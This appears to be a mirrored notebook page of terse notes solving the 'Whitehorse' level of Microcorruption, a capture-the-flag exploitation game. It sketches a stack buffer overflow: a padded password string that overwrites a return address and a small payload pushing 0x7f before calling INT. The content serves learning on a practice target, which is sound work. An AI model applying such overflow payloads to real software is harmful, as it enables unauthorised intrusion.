mirror of
https://git.soft.fish/val/MicroCorruption.git
synced 2024-12-04 18:55:58 +00:00
30 lines
475 B
Markdown
30 lines
475 B
Markdown
|
`Taken verbatim from my notebook`
|
||
|
# Page 1
|
||
|
```
|
||
|
Whitehorse
|
||
|
Password 8-16 chars
|
||
|
it takes 0x30 chars
|
||
|
Jumps to chars 18..20 as addr
|
||
|
|
||
|
ROP chains?
|
||
|
|
||
|
Goal: Set sp to 7f
|
||
|
Call INT
|
||
|
|
||
|
['A';16]32457f
|
||
|
|
||
|
push r14
|
||
|
push r15
|
||
|
push #7f
|
||
|
call INT
|
||
|
mov sp+2, r14 <- prep for call
|
||
|
|
||
|
[INT]00007f
|
||
|
sp sp
|
||
|
|
||
|
Lesson:
|
||
|
Control of the stack means
|
||
|
control of params passed on
|
||
|
the stack
|
||
|
```
|